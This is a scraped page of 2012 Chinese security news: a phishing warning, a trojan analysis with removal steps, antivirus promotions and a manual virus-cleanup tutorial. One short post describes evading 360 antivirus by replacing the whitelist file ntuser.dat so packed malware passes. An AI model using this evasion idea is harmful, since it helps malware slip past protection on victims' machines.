BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Windows</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-069</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>Kerberos&nbsp;中的漏洞可能允許拒絕服務&nbsp;(2743555)</strong>&nbsp;<br /><br />此安全更新可解決&nbsp;Microsoft Windows&nbsp;中一個秘密報告的漏洞。如果遠程攻擊者向&nbsp;Kerberos服務器發送特制會話請求,則該漏洞可能允許拒絕服務。采用防火墻最佳做法和標準的默認防火墻配置,有助于保護網絡免受從企業外部發起的攻擊。按照最佳做法,應使連接到&nbsp;Internet&nbsp;的系統所暴露的端口數盡可能少。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 111px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">重要&nbsp;<br />拒絕服務</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">需要重啟動</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">Microsoft Windows</td></tr><tr style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px"><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top">MS12-070</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 2.9pt; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 2.9pt; PADDING-BOTTOM: 2.9pt; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 502px; PADDING-TOP: 2.9pt; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="61%"><strong>SQL Server&nbsp;中的漏洞可能允許特權提升&nbsp;(2754849)</strong>&nbsp;<br /><br />此安全更新解決了運行&nbsp;SQL Server Reporting Services (SSRS)&nbsp;的系統上的&nbsp;Microsoft SQL Server&nbsp;中一個秘密報告的漏洞。該漏洞是一個跨站點腳本執行&nbsp;(XSS)&nbsp;漏洞,可能允許特權提升,使攻擊者能夠在目標用戶的上下文中的&nbsp;SSRS&nbsp;站點上執行任意命令。攻擊者可以通過向用戶發送特制的鏈接并誘使用戶單擊該鏈接來利用此漏洞。攻擊者還可以通過提供一個包含試圖利用此漏洞的網頁的網站來利用此漏洞。另外,接受或宿主用戶提供的內容或廣告的網站以及受到破壞的網站可能包含可能利用此漏洞的特制內容。</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 0cm; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 0cm; PADDING-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; WIDTH: 119px; PADDING-TOP: 0cm; BORDER-BOTTOM: windowtext 1pt solid" valign="top" width="14%">&nbsp;</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 0cm; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 0cm; PADDING-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 0cm; BORDER-BOTTOM: windowtext 1pt solid" valign="top">&nbsp;</td><td style="BORDER-RIGHT: windowtext 1pt solid; PADDING-RIGHT: 0cm; BORDER-TOP: windowtext 1pt solid; PADDING-LEFT: 0cm; PADDING-BOTTOM: 0cm; MARGIN: 0px; BORDER-LEFT: windowtext 1pt solid; PADDING-TOP: 0cm; BORDER-BOTTOM: windowtext 1pt solid" valign="top">&nbsp;</td></tr></tbody></table> [防護教程]12306出現高仿虛假網站 請認準12306.cn http://www.pirinnaturalssoapandspa.com//html/17277_1.html 佚名 防護教程 2012/9/28 13:56:35 <p>國慶和中秋假期臨近,網上預訂火車票也進入高峰期。與此同時,360“網址云安全”監測發現,近兩周來,訂票釣魚網站呈現明顯上升趨勢,一些不法分子甚至直接假冒中國鐵路客戶服務中心12306.cn網站,利用十分相似的域名迷惑用戶,用戶很容易因為輸入錯誤而誤入釣魚網站。<br /></p><p><img alt="" src="https://pic.cr173.com/up/2012-9/2012092813572278580.jpg" /></p><p><strong>圖1:360獨家發現并攔截假冒中國鐵路客戶服務中心的網站</strong></p><p>  以360獨家發現并攔截的www.12306.cm釣魚網站為例,雖然有些網絡安全常識的人都可以判斷和區分真假,但由于其網站后綴“.cm”和鐵路客戶服務中心的后綴“.cn”非常相似,很難分辨。此外,在電腦鍵盤布局上“m”鍵和“n”鍵相鄰,不小心輸錯網址的用戶很容易誤入該虛假網站。<br /><br /></p><p><img alt="" src="https://pic.cr173.com/up/2012-9/2012092813572374290.jpg" /></p><p><strong>圖2:假“12306”破綻明顯但域名迷惑性很高</strong></p><p>  目前,360瀏覽器及360安全衛士用戶無需升級,即可攔截該釣魚網站。同時,360安全瀏覽器標配的“網站名片”功能,可顯示用戶瀏覽的常見網站真實身份信息,準確幫用戶甄別訪問網站是否為釣魚網站,建議絕大多數網民安裝使用。<br /></p><p><img alt="" src="https://pic.cr173.com/up/2012-9/2012092813572368418.jpg" /></p><p><strong>圖3:360安全瀏覽器“網站名片”可顯示網站身份信息</strong></p><p>  同時,360安全專家也在此提醒廣大網民,類似假冒網站還有www.12306.cn.com,鐵道部官方售票渠道僅限www.12306.cn和電話95105105,目前并沒有授權其他網站開展類似服務內容,網民請不要輕易點擊或撥打網上搜到的購票網站或購票電話,以免遭受不必要的損失。</p> [安全產品]360白名單文件在哪、360白名單分析 http://www.pirinnaturalssoapandspa.com//html/17274_1.html 佚名 安全產品 2012/9/28 11:45:52 最近,在學習免殺這方面的知識。方便以后寫殼。但是,360的云查殺??偸钦J為我的殼是病毒。。真心蛋疼、、、<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;于是,添加到了白名單。于是,就百度下360白名單文件。發現,竟然沒人告訴我360白名單配置文件在那個位置。。。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;只好自己手動分析了。&nbsp;&nbsp;分析過程就不寫了。</p><p>&nbsp;白名單的目錄:</p><p>C:\Documents&nbsp;and&nbsp;Settings\Administrator\NTUSER.DAT&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(隱藏文件,不可修改與刪除)</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;知道了白名單的配置地址。那么,我們完全可以通過編程來實現修改360的白名單。加密算法不放出。&nbsp;給個簡單的思路。直接替換掉ntuser.dat&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;就可以無傷過360</p><p>{insd m=&quot;0&quot; i=&quot;11200&quot;}</p> [防護教程]CF三尸蠱木馬手工清除教程 http://www.pirinnaturalssoapandspa.com//html/16851_1.html 佚名 防護教程 2012/9/4 13:46:30 <p>CF三尸蠱的手工處理這個病毒相當麻煩,因為病毒禁用了眾多反病毒工具,打開就提示句柄錯誤。這個病毒禁用了大多數的殺軟,導致殺軟無法正常運行,目前只能手動處理,專殺將會盡快支持查殺。<br /><br />目前發現 gmer、rku 不在禁止列表,免于一死。<br /><br />gmer中文漢化版下載:<a href="http://www.pirinnaturalssoapandspa.com/soft/29375.html">http://www.pirinnaturalssoapandspa.com/soft/29375.html</a><br /><br /><strong>手工殺毒法<br /></strong>1、打開gmer--file--刪除<br />c:\Windows\System32\safemon.dll<br />c:\Windows\System32\drivers\nthook.sys <br />c:\Windows\System32\drivers\beep.sys<br />存在則也刪除<br />c:\Windows\System32\drivers\p2phook.sys<br /><br /><img alt="" src="https://pic.cr173.com/up/2012-9/201299441350108673.jpg" /><br /><br /><img alt="" src="https://pic.cr173.com/up/2012-9/201299441349565658.jpg" /><br /><br /><strong>2、使用bootice重置MBR (或者在dos下或者控制臺重置mbr,命令是 fdisk /mbr)<br /><br /></strong><span style="font-size:18px;color:#ff0000;">重置MBR圖文教程:</span><a href="http://www.pirinnaturalssoapandspa.com/html/16852_1.html"><span style="font-size:18px;color:#ff0000;">http://www.pirinnaturalssoapandspa.com/html/16852_1.html</span></a><br /><strong><br />3、新建以下文件夾占坑和免疫<br /></strong>c:\Windows\System32\safemon.dll<br />c:\Windows\System32\drivers\nthook.sys <br />c:\Windows\System32\drivers\p2phook.sys</p> [病毒漏洞]cf三尸蠱是什么?CF三尸蠱病毒之庖丁解牛 http://www.pirinnaturalssoapandspa.com//html/16849_1.html 佚名 病毒漏洞 2012/9/4 11:43:55 <p>&nbsp; 電腦管家云安全中心監測發現,近期一款名為“CF三尸蠱”的CF盜號木馬四處蔓延。這是一款帶驅動的MBR型木馬,屬于遠控木馬,隱藏性高、內部瓦解、持久性強。黑客通過CF游戲外掛捆綁此木馬病毒進行盜號,CF游戲玩家需要提高警惕。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 該木馬會感染系統文件,破壞用戶的安全軟件,收集用戶信息,修改用戶瀏覽器的主頁,連接黑客遠程計算機使用戶電腦完全被黑客掌控。此外,黑客在外掛中捆綁的木馬具有較高的隱蔽性,并且能夠破壞部分殺毒軟件的云查殺功能,當用戶出現賬號被盜情況之后,啟動殺毒軟件云查殺掃描,部分殺毒軟件會出現連接失敗等異常情況。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 該木馬是怎樣隱藏?怎樣內部瓦解玩家電腦的呢?讓我們一起透視它的行徑。</p><p><strong><strong>透視1:三重保險——進入玩家電腦</strong></strong></p><p>為了確保木馬成功進入玩家電腦,黑客使用了三重保險來保證木馬自啟動成功:修改用戶系統的MBR即用戶硬盤的主引導區記錄,<strong>確保優先注冊系統啟動</strong>;感染beep.sys系統文件</p><p><img src="https://pic.cr173.com/up/2012-9/2012090411442632367.png" alt="" /></p><p>圖1</p><p>創建木馬驅動服務:釋放cp.exe(功能以mima1用戶運行程序)和拷貝自己到C:\Temp目錄,創建mima1(Administrators權限)的用戶。利用cp.exe Administrators權限斷開用戶網絡和安裝木馬的驅動程序。</p><p><img src="https://pic.cr173.com/up/2012-9/2012090411442626495.png" alt="" /></p><p><img src="https://pic.cr173.com/up/2012-9/2012090411442699406.png" alt="" /></p><p>圖2</p><p><br /></p><p>通過 IpConfig /Release 命令斷網避免安全軟件的云查,斷網后安全木馬驅動模塊。</p><p><br /><strong>透視二:注入木馬主體——散布“害蟲”內部瓦解</strong></p><p>通過驅動程序來監視系統中部分進程的創建過程,并把safemon.dll(病毒釋放的主模塊)注入到所創建的進程中。以達到從內核全速瓦解玩家電腦的目的。過程如下:</p><p>①&nbsp;&nbsp;釋放C:\\Windows\\System32\\safemon.dll(病毒主體文件).</p><p>②&nbsp;&nbsp;注冊系統創建進程通知函數 PsSetCreateProcessNotifyRoutine,過濾部分進程的創建行為,對①中釋放的safemon.dll進行注入。</p><p><strong>透視三:屏蔽安全軟件云查殺——幽禁用戶安全部隊</strong></p><p>該木馬一手在玩家電腦內核翻云覆雨,一手又想在電腦網絡只手遮天。它屏蔽了一些安全軟件的云查殺IP地址,使得安全軟件部分功能失效,無法進行云查殺或更新。</p><p><strong>透視四:禁止用戶瀏覽安全廠商網址——切斷救援</strong></p><p>除了軟化安全軟件對自身的威脅,木馬還防止用戶自己去查詢和求救。其主體safemon.dll 會修改用戶瀏覽器主頁,過濾部分安全軟件廠商的網址,來禁止用戶查詢相關信息。讓用戶仿佛在一座孤島上,絕望淪為“魚肉”。</p><p><br /><strong>透視五:完美驅動級隱藏——立足長遠包藏禍心</strong></p><p>為了持久地破壞用戶電腦,成功遠程控制,該木馬還費盡心思,改頭換面,釋放并安裝NtHook.sys驅動程序,主要是HOOK內核中文件與注冊表操作函數以達到隱藏自己的目的。恣意來日方長的遠程連接木馬作者計算機,使用戶計算機成為“肉機”。</p><p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;綜上五種透視,CF外掛所捆綁的木馬可不亞于CF激戰本身。<a href="http://www.pirinnaturalssoapandspa.com/soft/11253.html" target="_blank"><span style="font-size:18px;">QQ</span></a><a href="http://www.pirinnaturalssoapandspa.com/soft/11253.html" target="_blank"><span style="font-size:18px;">電腦管家</span></a><span style="color:#cc0000;">安全中心提示廣大游戲玩家,慎用外掛,安全游戲</span>。目前電腦管家已經成功攔截該木馬,為你的激戰保駕護航。</p> [安全產品]360殺毒4.0 云動版發布 http://www.pirinnaturalssoapandspa.com//html/16804_1.html 佚名 安全產品 2012/8/31 16:41:45 <p>360殺毒4.0 “云動”搶鮮版發布了!360殺毒4.0“云動”以至輕至強的智能防御,至簡靈動的用戶界面,讓您提前感受下一代殺毒軟件帶來的全新體驗。</p><p>360殺毒3.0在不久前通過了全面嚴格的安全測試,成為首家進入Windows 8 應用商店的國產殺毒軟件。360殺毒4.0不但全面繼承了360殺毒3.0的優良品質,更是帶來了創新的技術和功能特性 - 全新構建的監控防御架構,在不犧牲系統性能的前提下全面提升了對病毒攔截的靈敏度;內嵌360人工智能啟發式引擎QVM第二代,殺毒更聰明;加強版沙箱,杜絕病毒感染與隱私泄露;小紅傘與BitDefender引擎可同時開啟,提供更加凌厲的查殺和監控能力;耳目一新的“云動”交互界面,讓您在盡享安全之余,更能有便捷、愉悅的使用體驗。<br/><br/></p><p>正因為4.0新版具有如此之多的功能和技術亮點,我們非常興奮地邀請您搶鮮體驗,并請您把您對產品的意見和建議告訴我們。</p><p><span style="font-size:18px;color:#ff0000;">360殺毒4.0 下載地址:</span><a href="http://www.pirinnaturalssoapandspa.com/soft/7096.html"><span style="font-size:18px;color:#ff0000;">http://www.pirinnaturalssoapandspa.com/soft/7096.html</span></a><br/><br/><strong>360殺毒4.0的主要亮點介紹如下:</strong></p><p><strong>第二代QVM人工智能啟發式引擎,殺毒更“聰明”</strong></p><p>人工智能啟發式引擎QVM是360的獨創技術,早在360殺毒3.0版時就已經加入了引擎體系,并作為檢測新生病毒的利器備受贊譽。它基于人工智能算法,獨具“自學習、自進化”優勢,秒殺新生木馬病毒,助力360殺毒獲得AV-C國際評測查殺率第一。在4.0版本中,融合了人工智能及云安全技術的第二代QVM引擎首次亮相,對新生病毒的偵測能力顯著提高。</p><p><strong>高靈敏輕量級防御架構,即時秒殺威脅</strong></p><p>我們重新構建了文件監控防御架構,大大提升了實時防御的靈敏度,能夠實時捕捉病毒威脅,預防效果更出色;同時,新的防護體系還進一步減少了對系統資源的占用,殺毒4.0的總體性能提升30%以上,電腦輕快不卡機。</p><p><strong>全新“云動”界面,殺毒軟件也性感</strong></p><p>前所未有的清爽,靈動優美的體驗!顛覆殺毒軟件刻板枯燥的傳統形象,為您帶來簡潔而不簡單的操作體驗。</p><p>1)輕盈的單一窗口界面,徹底擺脫標簽頁的束縛。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-11/2019110410303670916.png" alt=""/></p><p>2)點擊下拉箭頭,即可展開防護狀態窗口,所有防護組件狀態一目了然。您還可以根據自己的需要來調整防護狀態。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-11/2019110410303698958.png" alt=""/></p><p>3)點擊主界面右下角的“更多”按鈕即可向右滑出工具大全擴展窗口,并且可以從工具大全中隨意拖拽工具到主界面右下角區域,以便快捷使用。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-11/2019110410303636737.png" alt=""/></p><p>4)可塑性超強的換膚模型。您可以根據自己的喜好來挑選或是制作驚艷、多變的皮膚。</p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-11/2019110410303732974.png" alt=""/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-11/2019110410303795872.png" alt=""/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-11/2019110410303716562.png" alt=""/></p><p><strong>加強版沙箱,看片更安全</strong><br/>想看片又怕中毒?加強版隔離沙箱為您提供百毒不侵的安全體驗,運行風險程序不感染真實系統,新增“斷網模式”保護隱私不側漏。<br/></p><p style="text-align:center;"><img src="https://pic.cr173.com/up/2019-11/2019110410303812799.png" alt=""/></p><p><strong>兩大知名反病毒引擎雙劍合璧</strong></p><p>智能引擎調度技術升級,可選同時開啟小紅傘和BitDefender兩大知名反病毒引擎,雙劍合璧查殺監控更凌厲。</p><p>更多的其他功能和技術亮點,歡迎您親自下載體驗。</p> [安全產品]使用騰訊手機管家電腦版給你的手機查殺病毒 http://www.pirinnaturalssoapandspa.com//html/16073_1.html 佚名 安全產品 2012/7/5 22:24:48 <p>本來用起來好好的Android手機突然間讓人感覺變卡了,懷疑手機可能中毒但卻拿不出實質的證據。其實,要看看手機是否中毒“病”倒了,讓“大夫”騰訊手機管家PC版幫您的手機做個安全體檢就一清二楚。 </p><p>{insd m=&quot;0&quot; i=&quot;33281&quot;}</p><p><strong>騰訊手機管家PC版安全體檢功能有什么用?</strong> </p><p>騰訊手機管家PC版安全體檢功能,顧名思義,就是幫您的Android手機把把脈,診一下手機是不是安裝了惡意應用導致被無端端扣費,診一下是不是開了太多的應用占用了內存導致運行不順暢,診一下現在的Android系統是不是還能變得更健康跑得更快。</p><p><strong>手機安全體檢——保持手機最佳狀態</strong> </p><p>懷疑手機中毒變卡的話,那就馬上讓騰訊手機管家幫手機做個手機安全體檢吧。體檢方法很簡單,讓手機跟騰訊手機管家PC版連接之后,點擊騰訊手機管家PC版首頁主界面上大大的“安全體檢”綠色按鈕(圖1),即可進行手機體驗。</p><p>&nbsp;<img src="https://pic.cr173.com/up/2012-7/2012070522284195279.jpg" alt="" /></p><p>圖1 騰訊手機管家PC版上大大的的“安全體檢”綠色按鈕</p><p>點擊“安全體檢”綠色大按鈕之后,“大夫”騰訊手機管家PC版馬上給您心愛的Android手機進行包括應用檢測、進程掃描在內的多項掃描操作(圖2)。</p><p>&nbsp;<img src="https://pic.cr173.com/up/2012-7/2012070522284192343.jpg" alt="" /></p><p>圖2 騰訊手機管家PC版對手機進行安全體檢的過程</p><p>稍等片刻之后(體檢時間隨手機安裝應用數量的增加而增加),騰訊手機管家PC版隨即給出一份比較詳細的手機體檢報告,這份體檢報告不像某些大醫院給出的體檢報告那樣令人看得頭暈,反而剛好相反讓人一看就懂!</p><p><img src="https://pic.cr173.com/up/2012-7/2012070522284152820.jpg" alt="" /></p><p>&nbsp;圖3 騰訊手機管家的體檢報告讓人一看就懂</p><p>體檢報告中的可優化項目、推薦項目和已完成項目列得清清楚楚(圖3),讓您對您的手機的健康狀況有個最基本了解。如果您的Android手機安裝了騰訊手機管家(手機版),還能對手機進行深度掃描安全體檢。</p><p>當您選擇對手機進行一鍵優化之后,騰訊手機管家PC版會顯示你的手機健康狀況為良好(圖4),此時也證明你的手機無病無痛,非常健康。如果覺得手機還不夠健康,還能再重新掃描一次。 </p><p>&nbsp;<img src="https://pic.cr173.com/up/2012-7/2012070522284197688.jpg" alt="" /></p><p>&nbsp;圖4 騰訊手機管家PC版顯示手機健康狀況良好</p><p><strong>總結</strong> </p><p>在沒有安裝安全優化類應用的情況下,手機在使用過程中難免打開了太多的應用導致系統變卡變慢,也難免會安裝了惡意應用導致手機中毒了。不管你的手機遇上什么疑難雜癥,建議先讓騰訊手機管家PC版幫您的手機做個體檢吧,這樣才能對癥下藥。 </p> [防護教程]金山火眼發布 幫助用戶在線檢測exe文件是否病毒 http://www.pirinnaturalssoapandspa.com//html/15975_1.html 佚名 防護教程 2012/6/28 14:35:17 <p>金山網絡發布了其最新產品“火眼”的1.2.3α版本,本次更新包括了對一些病毒的識別能力的提高、增加微博分享以及修復一些bug等功能。<br />同時,火眼將在每周三進行一次更新?;鹧凼且豢钤诰的自動分析文件行為的一個在線沙箱,可以清晰地看到可執行文件的每一個運行中的行為。<br /><br /><img src="https://pic.cr173.com/up/2012-6/20126628281436412286.jpg" alt="" /></p><p>以下為更新內容:<br /><strong>重點推薦內容</strong><br />1,增強對QQ粘蟲隱藏窗口的識別 (點我看報告)<br /><img alt="" src="https://pic.cr173.com/up/2012-6/2012062814360930719.jpg" />&nbsp;<br />2,增強對QQ盜號木馬的識別(點我看報告)<br /><img alt="" src="https://pic.cr173.com/up/2012-6/2012062814361083042.jpg" />&nbsp;<br />3,新增微博分享功能<br /><img alt="" src="https://pic.cr173.com/up/2012-6/2012062814361065953.jpg" />&nbsp;<br /><img alt="" src="https://pic.cr173.com/up/2012-6/2012062814361020557.jpg" />&nbsp;<br /><br /><strong>其他修改</strong><br />1. 添加ShowWindow函數的監控;<br />2. 增加隱藏窗口行為的解析;<br />3. 優化后臺數據結構,大幅提升訪問速度;<br />BUG修復:<br />1. 修復PATCH模塊導致帶有自校驗的樣本異常退出的BUG;<br />2. “傲游瀏覽器”拼寫錯誤的修正;</p> [系統安全]360殺毒引擎怎么改為小紅傘引擎? http://www.pirinnaturalssoapandspa.com//html/15569_1.html 西西 系統安全 2012/6/1 12:20:18 <p>今天早上西西打開電腦上網,忽然發現自己電腦的時間變為2011年6月1日了,可是今天明明是2012年的六一兒童節哦。只好手工把時間改為了2012年。<br /><br />后來從360官方論壇發現,原來也還有其他朋友的電腦的時間也退回到了2011年,據官方解釋,可能是由于殺毒軟件BD引擎造成的,<span style="color:#cc0000;">使用360殺毒的用戶建議把360殺毒引擎改為小紅傘引擎</span>。<br /><br />哪怎么把360殺毒引擎怎么改為小紅傘引擎呢?<br /><br />請看西西的圖文教程。<br /><br />1、先切換到專業模式:<br /><br /><img src="https://pic.cr173.com/up/2012-6/201261122815.jpg" alt="" /><br /><br />2、點擊左下角的引擎連接:<br /><br /><img src="https://pic.cr173.com/up/2012-6/201261122041.jpg" alt="" /><br /><br />3、多引擎設置:<br /><br /><img src="https://pic.cr173.com/up/2012-6/201261122227.jpg" alt="" /><br /><br />4、把BitDefender常規查殺引擎改為小紅傘常規查殺引擎:<br /><br /><img src="https://pic.cr173.com/up/2012-6/201261122940.jpg" alt="" /><br /><br />5、OK了,這樣就把360殺毒引擎改了哦。<br /></p> [系統安全]電腦中病毒后怎么手動清除教程 http://www.pirinnaturalssoapandspa.com//html/15388_1.html 佚名 系統安全 2012/5/21 10:18:11 <div>一、檢查注冊表啟動項<br /><br />大多病毒都會進入注冊表啟動項的,我們可以通過一些方法查看和刪除。打開注冊表HKEY_LOCAL_MACHINE\SOFTWARE&nbsp;\Microsoft\Windows\CurrentVersion點擊查看其中RUN中的內容,如果不懂,把里面的東西就全刪了。不過這樣并不能解決病毒,病毒還會重新寫入的,不過到時可以解決木馬。如果想手工殺毒,就接著看下面的文章吧!<br /></div><div></div><div></div><p><br /></p><div>二、解決不能查看隱藏文件的方法</div><div>1、有時病毒通過修改注冊表和修改文件屬性(偽造CheckedValue值)的方法來達到不能查看隱藏文件的目的,這是可是打開修改注冊表,找到&nbsp;&nbsp;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer&nbsp;\&nbsp;&nbsp;Advanced\Folder\Hidden\SHOWALL,刪除CheckedValue鍵(該鍵當前為字符串類型),新建&nbsp;CheckedValue為DWORD值(正確的鍵為DWORD類型),修改值為1,系統隱藏文件就會顯示了,恢復正常。<br /></div><div>2、也可以通過ATTRIB命令使文件去掉隱藏和系統的屬性。例如顯示C盤根目錄下文件,就可以在CMD命令提示符下輸入CD\命令切換到根目錄下,然后輸入ATTRIB&nbsp;-S&nbsp;-H&nbsp;AUTORUN.INF命令就可以了<br /></div><div></div><p><br /></p><div>三、怎樣刪除病毒的主體文件<br />&nbsp;&nbsp;&nbsp;&nbsp;病毒都是有主體文件的,我們要手工殺毒首先就要清除病毒的主體文件,主體文件一般都是DLL文件,直接刪是無法刪除的,我們可以試試一下的方法(目前還沒有發現什么DDL&nbsp;&nbsp;文件不能被這三種方法刪除的)。<br /><br />1、進入安全模式刪除<br /><br />2、用windows系統自帶的Rundll32.exe卸載后再刪除,這一招對付wmpcd32.dll是很靈驗的。在命令提示符下輸入:Rundll32.exe&nbsp;文件名.DLL&nbsp;Uninstall<br /><br />3、找出這個DLL文件的寄宿。方法:要使用一款名為procexp進程管理工具,點擊find,再點擊find&nbsp;DLl,打開DLL文件查找對話框,在DLL&nbsp;Substring中輸入“文件名.DLL”.點擊&nbsp;&nbsp;&nbsp;Search按鈕就可以看到DLL文件被哪個進程調用了,只要結束這些進程,再嘗試刪除DLL文件就可以了。</div><div>注:如病毒文件為RGWatch.sys的也可以使用同樣的方法找出寄宿進程,然后再刪掉。此外冰刃也是個不錯的選擇。<br /></div><p><br /></p><div>四、刪除注冊表病毒垃圾<br />&nbsp;&nbsp;&nbsp;&nbsp;這個沒什么好說的,就是在我們手工殺完毒后別忘了刪除其所在注冊表留下的一些信息。方法:打開注冊表(regedit),搜索我們要刪除的病毒名即可。有時候我們無法刪除,<br />可以使用冰刃強行刪除。因為冰刃沒有注冊表修改搜索功能,我們可以先在注冊表編輯器中搜索出相關項,再在冰刃的注冊表中定位到搜索項目,然后刪除!<br /></div><p><br /></p><div>五、找到病毒保護文件,強行刪除!<br /><br />很多病毒都會產生保護文件的,當你刪出病毒后,病毒又會回來,很煩人,也很難辦!我們可以使用下面的方法找出其保護文件,在這里需要兩款輔助工具:Filemon和冰刃。&nbsp;&nbsp;Filemon的作用是記錄下對所有文件的添加、修改和刪除記錄,并且可以顯示是哪個進程進行的修改!<br /></div><div>方法操作如下:打開冰刃,在設置里選擇“禁止進/線程建立”,打開進程,結束所有無用進程(結束explorer.exe進程),只留下系統基本進程(不包括explorer.exe進程)一—方便我們詳細記錄。逐一刪除注冊表啟動項目,并且刷新查看是否會自動恢復。在Filemon中就會發現這個保護進程了!<br /></div><p><br /></p><div>六、殺毒軟件被禁用的解決方法<br />&nbsp;&nbsp;&nbsp;&nbsp;殺毒軟件是病毒的克星,所以病毒要想生存就必須殺掉殺毒軟件。這也是現在很多病毒都具備的功能,也就是中毒后殺毒軟件不可用了。<br />&nbsp;&nbsp;&nbsp;<br />&nbsp;&nbsp;&nbsp;1、比較普遍的殺毒軟件中毒現象是會提示:應用程序正常初始化(0x00000ba)失敗。<br /></div><div><strong>原因分析:</strong><br />&nbsp;&nbsp;&nbsp;ws2_32.dll是windows&nbsp;sockets應用程序接口,用于支持Internet和網絡應用程序,程序運行時會自動調用ws2_32.dll文件。ws2_32.dll是個動態鏈接庫文件,位于系統文件夾中,windows在查找動態鏈接庫文件時,會現在應用程序當前目錄搜索,如果沒有找到才會搜索windows所在目錄,如果還沒有找到就會搜索&nbsp;system32和system目錄。一些病毒就<br />是利用此原理在殺毒軟件目錄中建立了ws2_32.dll文件或文件夾,在殺毒軟件看來這是一個它需要的文件而調用,但事實上這個所謂的“文件”又不具真<br />正的ws2_32.dll文件所具備的功能,所以殺毒軟件也就無法正常運行了,于是就會提示:應用程序正常初始化(0x00000ba)失??!<br /><strong></strong></div><div><strong>解決辦法:</strong><br /><br />到殺毒軟件安裝目錄找&nbsp;ws2_32.dll文件或文件夾,刪除即可!<br />注:如果找不到,可能是隱藏了,按照上面說的方法即可解決。如果找到后仍無法刪除,原因是里面有個名為1.的文件夾,該文件夾對于windows環境無法識別,此時可以用冰刃刪除<br /></div><div>&nbsp;&nbsp;&nbsp;2、IFEO劫持(冰刃等殺病毒工具不可用)<br />&nbsp;&nbsp;<br />貌似冰刃是病毒的一個大危害,病毒自然也不會放過。有時候中毒后,所有殺毒軟件和反病毒工具(比如冰刃)都無法使用了,原因就是IFEO劫持。原因:<br /><br />通過修改注冊表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows&nbsp;NT\CurrentVersion\Image&nbsp;File&nbsp;Execution&nbsp;Options下建立特定的子鍵來屏蔽一些特定的程序,或指向<br 